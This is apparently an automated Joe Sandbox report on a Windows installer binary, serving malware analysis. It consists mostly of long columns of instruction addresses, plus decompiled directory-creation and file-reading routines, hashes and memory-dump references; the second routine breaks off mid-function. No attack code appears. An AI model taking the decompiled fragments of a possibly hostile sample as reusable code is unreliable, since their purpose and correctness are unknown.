                                                                                                                                                                                                  0x00406c54
                                                                                                                                                                                                  0x00406c58
                                                                                                                                                                                                  0x00406c5b
                                                                                                                                                                                                  0x00406c61
                                                                                                                                                                                                  0x00406c63
                                                                                                                                                                                                  0x00406c63
                                                                                                                                                                                                  0x00406c63
                                                                                                                                                                                                  0x00406c66
                                                                                                                                                                                                  0x00406c69
                                                                                                                                                                                                  0x00406c69
                                                                                                                                                                                                  0x00406c69
                                                                                                                                                                                                  0x00406c6f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406c71
                                                                                                                                                                                                  0x00406c74
                                                                                                                                                                                                  0x00406c77
                                                                                                                                                                                                  0x00406c7a
                                                                                                                                                                                                  0x00406c7d
                                                                                                                                                                                                  0x00406c80
                                                                                                                                                                                                  0x00406c83
                                                                                                                                                                                                  0x00406c86
                                                                                                                                                                                                  0x00406c89
                                                                                                                                                                                                  0x00406c8c
                                                                                                                                                                                                  0x00406c8f
                                                                                                                                                                                                  0x00406ca7
                                                                                                                                                                                                  0x00406caa
                                                                                                                                                                                                  0x00406cad
                                                                                                                                                                                                  0x00406cb0
                                                                                                                                                                                                  0x00406cb0
                                                                                                                                                                                                  0x00406cb3
                                                                                                                                                                                                  0x00406cb7
                                                                                                                                                                                                  0x00406cb9
                                                                                                                                                                                                  0x00406c91
                                                                                                                                                                                                  0x00406c91
                                                                                                                                                                                                  0x00406c99
                                                                                                                                                                                                  0x00406c9e
                                                                                                                                                                                                  0x00406ca0
                                                                                                                                                                                                  0x00406ca2
                                                                                                                                                                                                  0x00406ca2
                                                                                                                                                                                                  0x00406cbc
                                                                                                                                                                                                  0x00406cc3
                                                                                                                                                                                                  0x00406cc6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cc8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cc8
                                                                                                                                                                                                  0x00406cc6
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d08
                                                                                                                                                                                                  0x00406d08
                                                                                                                                                                                                  0x00406d0c
                                                                                                                                                                                                  0x00407314
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407314
                                                                                                                                                                                                  0x00406d12
                                                                                                                                                                                                  0x00406d15
                                                                                                                                                                                                  0x00406d18
                                                                                                                                                                                                  0x00406d1c
                                                                                                                                                                                                  0x00406d1f
                                                                                                                                                                                                  0x00406d25
                                                                                                                                                                                                  0x00406d27
                                                                                                                                                                                                  0x00406d27
                                                                                                                                                                                                  0x00406d27
                                                                                                                                                                                                  0x00406d2a
                                                                                                                                                                                                  0x00406d2d
                                                                                                                                                                                                  0x00406d2d
                                                                                                                                                                                                  0x00406d33
                                                                                                                                                                                                  0x00406cd1
                                                                                                                                                                                                  0x00406cd1
                                                                                                                                                                                                  0x00406cd4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cd4
                                                                                                                                                                                                  0x00406d35
                                                                                                                                                                                                  0x00406d35
                                                                                                                                                                                                  0x00406d38
                                                                                                                                                                                                  0x00406d3b
                                                                                                                                                                                                  0x00406d3e
                                                                                                                                                                                                  0x00406d41
                                                                                                                                                                                                  0x00406d44
                                                                                                                                                                                                  0x00406d47
                                                                                                                                                                                                  0x00406d4a
                                                                                                                                                                                                  0x00406d4d
                                                                                                                                                                                                  0x00406d50
                                                                                                                                                                                                  0x00406d53
                                                                                                                                                                                                  0x00406d6b
                                                                                                                                                                                                  0x00406d6e
                                                                                                                                                                                                  0x00406d71
                                                                                                                                                                                                  0x00406d74
                                                                                                                                                                                                  0x00406d74
                                                                                                                                                                                                  0x00406d77
                                                                                                                                                                                                  0x00406d7b
                                                                                                                                                                                                  0x00406d7d
                                                                                                                                                                                                  0x00406d55
                                                                                                                                                                                                  0x00406d55
                                                                                                                                                                                                  0x00406d5d
                                                                                                                                                                                                  0x00406d62
                                                                                                                                                                                                  0x00406d64
                                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                                  0x00406d80
                                                                                                                                                                                                  0x00406d87
                                                                                                                                                                                                  0x00406d8a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d8c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d8c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                  0x0040701d
                                                                                                                                                                                                  0x00407344
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407344
                                                                                                                                                                                                  0x00407023
                                                                                                                                                                                                  0x00407026
                                                                                                                                                                                                  0x00407029
                                                                                                                                                                                                  0x0040702d
                                                                                                                                                                                                  0x00407030
                                                                                                                                                                                                  0x00407036
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x0040703b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406dec
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407128
                                                                                                                                                                                                  0x0040712c
                                                                                                                                                                                                  0x0040714e
                                                                                                                                                                                                  0x00407151
                                                                                                                                                                                                  0x0040715b
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040712e
                                                                                                                                                                                                  0x00407131
                                                                                                                                                                                                  0x00407135
                                                                                                                                                                                                  0x00407138
                                                                                                                                                                                                  0x00407138
                                                                                                                                                                                                  0x0040713b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071e5
                                                                                                                                                                                                  0x004071e9
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x0040720e
                                                                                                                                                                                                  0x00407215
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x004071eb
                                                                                                                                                                                                  0x004071ee
                                                                                                                                                                                                  0x004071f1
                                                                                                                                                                                                  0x004071f4
                                                                                                                                                                                                  0x004071fb
                                                                                                                                                                                                  0x0040713f
                                                                                                                                                                                                  0x0040713f
                                                                                                                                                                                                  0x00407142
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072d6
                                                                                                                                                                                                  0x004072d9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f10
                                                                                                                                                                                                  0x00406f12
                                                                                                                                                                                                  0x00406f19
                                                                                                                                                                                                  0x00406f1a
                                                                                                                                                                                                  0x00406f1c
                                                                                                                                                                                                  0x00406f1f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f27
                                                                                                                                                                                                  0x00406f2a
                                                                                                                                                                                                  0x00406f2d
                                                                                                                                                                                                  0x00406f2f
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f32
                                                                                                                                                                                                  0x00406f35
                                                                                                                                                                                                  0x00406f3c
                                                                                                                                                                                                  0x00406f3f
                                                                                                                                                                                                  0x00406f4d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407226
                                                                                                                                                                                                  0x0040722d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407236
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x0040723c
                                                                                                                                                                                                  0x0040723f
                                                                                                                                                                                                  0x00407242
                                                                                                                                                                                                  0x00407246
                                                                                                                                                                                                  0x00407249
                                                                                                                                                                                                  0x0040724f
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407254
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725e
                                                                                                                                                                                                  0x004072be
                                                                                                                                                                                                  0x004072c1
                                                                                                                                                                                                  0x004072c6
                                                                                                                                                                                                  0x004072c7
                                                                                                                                                                                                  0x004072c9
                                                                                                                                                                                                  0x004072cb
                                                                                                                                                                                                  0x004072ce
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00407260
                                                                                                                                                                                                  0x00407266
                                                                                                                                                                                                  0x00407269
                                                                                                                                                                                                  0x0040726c
                                                                                                                                                                                                  0x0040726f
                                                                                                                                                                                                  0x00407272
                                                                                                                                                                                                  0x00407275
                                                                                                                                                                                                  0x00407278
                                                                                                                                                                                                  0x0040727b
                                                                                                                                                                                                  0x0040727e
                                                                                                                                                                                                  0x00407281
                                                                                                                                                                                                  0x0040729a
                                                                                                                                                                                                  0x0040729d
                                                                                                                                                                                                  0x004072a0
                                                                                                                                                                                                  0x004072a3
                                                                                                                                                                                                  0x004072a7
                                                                                                                                                                                                  0x004072a9
                                                                                                                                                                                                  0x004072a9
                                                                                                                                                                                                  0x004072aa
                                                                                                                                                                                                  0x004072ad
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x0040728b
                                                                                                                                                                                                  0x00407290
                                                                                                                                                                                                  0x00407292
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x004072b0
                                                                                                                                                                                                  0x004072b7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f55
                                                                                                                                                                                                  0x00406f58
                                                                                                                                                                                                  0x00406f8e
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070c1
                                                                                                                                                                                                  0x004070c1
                                                                                                                                                                                                  0x004070c4
                                                                                                                                                                                                  0x004070c6
                                                                                                                                                                                                  0x00407350
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407350
                                                                                                                                                                                                  0x004070cc
                                                                                                                                                                                                  0x004070cf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070d5
                                                                                                                                                                                                  0x004070d9
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x00406f5a
                                                                                                                                                                                                  0x00406f5c
                                                                                                                                                                                                  0x00406f5e
                                                                                                                                                                                                  0x00406f60
                                                                                                                                                                                                  0x00406f63
                                                                                                                                                                                                  0x00406f64
                                                                                                                                                                                                  0x00406f66
                                                                                                                                                                                                  0x00406f68
                                                                                                                                                                                                  0x00406f6b
                                                                                                                                                                                                  0x00406f6e
                                                                                                                                                                                                  0x00406f84
                                                                                                                                                                                                  0x00406f89
                                                                                                                                                                                                  0x00406fc1
                                                                                                                                                                                                  0x00406fc1
                                                                                                                                                                                                  0x00406fc5
                                                                                                                                                                                                  0x00406ff1
                                                                                                                                                                                                  0x00406ff3
                                                                                                                                                                                                  0x00406ffa
                                                                                                                                                                                                  0x00406ffd
                                                                                                                                                                                                  0x00407000
                                                                                                                                                                                                  0x00407000
                                                                                                                                                                                                  0x00407005
                                                                                                                                                                                                  0x00407005
                                                                                                                                                                                                  0x00407007
                                                                                                                                                                                                  0x0040700a
                                                                                                                                                                                                  0x00407011
                                                                                                                                                                                                  0x00407014
                                                                                                                                                                                                  0x00407041
                                                                                                                                                                                                  0x00407041
                                                                                                                                                                                                  0x00407044
                                                                                                                                                                                                  0x00407047
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x00407049
                                                                                                                                                                                                  0x0040704f
                                                                                                                                                                                                  0x00407052
                                                                                                                                                                                                  0x00407055
                                                                                                                                                                                                  0x00407058
                                                                                                                                                                                                  0x0040705b
                                                                                                                                                                                                  0x0040705e
                                                                                                                                                                                                  0x00407061
                                                                                                                                                                                                  0x00407064
                                                                                                                                                                                                  0x00407067
                                                                                                                                                                                                  0x0040706a
                                                                                                                                                                                                  0x00407083
                                                                                                                                                                                                  0x00407085
                                                                                                                                                                                                  0x00407088
                                                                                                                                                                                                  0x00407089
                                                                                                                                                                                                  0x0040708c
                                                                                                                                                                                                  0x0040708e
                                                                                                                                                                                                  0x00407091
                                                                                                                                                                                                  0x00407093
                                                                                                                                                                                                  0x00407095
                                                                                                                                                                                                  0x00407098
                                                                                                                                                                                                  0x0040709a
                                                                                                                                                                                                  0x0040709d
                                                                                                                                                                                                  0x004070a1
                                                                                                                                                                                                  0x004070a3
                                                                                                                                                                                                  0x004070a3
                                                                                                                                                                                                  0x004070a4
                                                                                                                                                                                                  0x004070a7
                                                                                                                                                                                                  0x004070aa
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x00407074
                                                                                                                                                                                                  0x00407079
                                                                                                                                                                                                  0x0040707b
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x004070ad
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x00406fc7
                                                                                                                                                                                                  0x00406fca
                                                                                                                                                                                                  0x00406fcc
                                                                                                                                                                                                  0x00406fcf
                                                                                                                                                                                                  0x00406fd2
                                                                                                                                                                                                  0x00406fd5
                                                                                                                                                                                                  0x00406fd7
                                                                                                                                                                                                  0x00406fda
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe3
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406f70
                                                                                                                                                                                                  0x00406f73
                                                                                                                                                                                                  0x00406f75
                                                                                                                                                                                                  0x00406f78
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cdb
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00406ce1
                                                                                                                                                                                                  0x00406ce4
                                                                                                                                                                                                  0x00406ce7
                                                                                                                                                                                                  0x00406cea
                                                                                                                                                                                                  0x00406ced
                                                                                                                                                                                                  0x00406cf0
                                                                                                                                                                                                  0x00406cf3
                                                                                                                                                                                                  0x00406cf5
                                                                                                                                                                                                  0x00406cf8
                                                                                                                                                                                                  0x00406cfb
                                                                                                                                                                                                  0x00406cfe
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e66
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00406e6c
                                                                                                                                                                                                  0x00406e6f
                                                                                                                                                                                                  0x00406e72
                                                                                                                                                                                                  0x00406e75
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e7a
                                                                                                                                                                                                  0x00406e7d
                                                                                                                                                                                                  0x00406e80
                                                                                                                                                                                                  0x00406e83
                                                                                                                                                                                                  0x00406e86
                                                                                                                                                                                                  0x00406e89
                                                                                                                                                                                                  0x00406e8a
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                                  0x00406e92
                                                                                                                                                                                                  0x00406e95
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e9b
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070e3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070e9
                                                                                                                                                                                                  0x004070ec
                                                                                                                                                                                                  0x004070ef
                                                                                                                                                                                                  0x004070f2
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f7
                                                                                                                                                                                                  0x004070fa
                                                                                                                                                                                                  0x004070fd
                                                                                                                                                                                                  0x00407100
                                                                                                                                                                                                  0x00407103
                                                                                                                                                                                                  0x00407106
                                                                                                                                                                                                  0x00407107
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x0040710c
                                                                                                                                                                                                  0x0040710f
                                                                                                                                                                                                  0x00407112
                                                                                                                                                                                                  0x00407115
                                                                                                                                                                                                  0x00407118
                                                                                                                                                                                                  0x0040711c
                                                                                                                                                                                                  0x0040711e
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00407356
                                                                                                                                                                                                  0x00407378
                                                                                                                                                                                                  0x0040737e
                                                                                                                                                                                                  0x00407380
                                                                                                                                                                                                  0x00407387
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;, xrefs: 0040694D
                                                                                                                                                                                                  • rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1, xrefs: 00406943
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;$rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1
                                                                                                                                                                                                  • API String ID: 0-11301910
                                                                                                                                                                                                  • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                                  • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 558 40591f-40596a CreateDirectoryW 559 405970-40597d GetLastError 558->559 560 40596c-40596e 558->560 561 405997-405999 559->561 562 40597f-405993 SetFileSecurityW 559->562 560->561 562->560 563 405995 GetLastError 562->563 563->561
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E0040591F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                                                                                                  0x0040592a
                                                                                                                                                                                                  0x0040592e
                                                                                                                                                                                                  0x00405931
                                                                                                                                                                                                  0x00405937
                                                                                                                                                                                                  0x0040593b
                                                                                                                                                                                                  0x0040593f
                                                                                                                                                                                                  0x00405947
                                                                                                                                                                                                  0x0040594e
                                                                                                                                                                                                  0x00405954
                                                                                                                                                                                                  0x0040595b
                                                                                                                                                                                                  0x00405962
                                                                                                                                                                                                  0x0040596a
                                                                                                                                                                                                  0x0040596c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040596c
                                                                                                                                                                                                  0x00405976
                                                                                                                                                                                                  0x0040597d
                                                                                                                                                                                                  0x00405993
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405995
                                                                                                                                                                                                  0x00405999

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405976
                                                                                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405995
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3449924974-0
                                                                                                                                                                                                  • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                                                                                                  • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004031D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 647 4031d6-4031e3 648 403201-40320a call 4032de 647->648 649 4031e5-4031fb SetFilePointer 647->649 652 403210-403223 call 405f61 648->652 653 4032d8-4032db 648->653 649->648 656 4032c8 652->656 657 403229-40323c call 4032de 652->657 659 4032ca-4032cb 656->659 661 403242-403245 657->661 662 4032d6 657->662 659->653 663 4032a4-4032aa 661->663 664 403247-40324a 661->664 662->653 665 4032ac 663->665 666 4032af-4032c6 ReadFile 663->666 664->662 667 403250 664->667 665->666 666->656 668 4032cd-4032d0 666->668 669 403255-40325f 667->669 668->662 670 403261 669->670 671 403266-403278 call 405f61 669->671 670->671 671->656 674 40327a-403281 call 405f90 671->674 676 403286-403288 674->676 677 4032a0-4032a2 676->677 678 40328a-40329c 676->678 677->659 678->669 679 40329e 678->679 679->662
                                                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                                                  			E004031D6(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
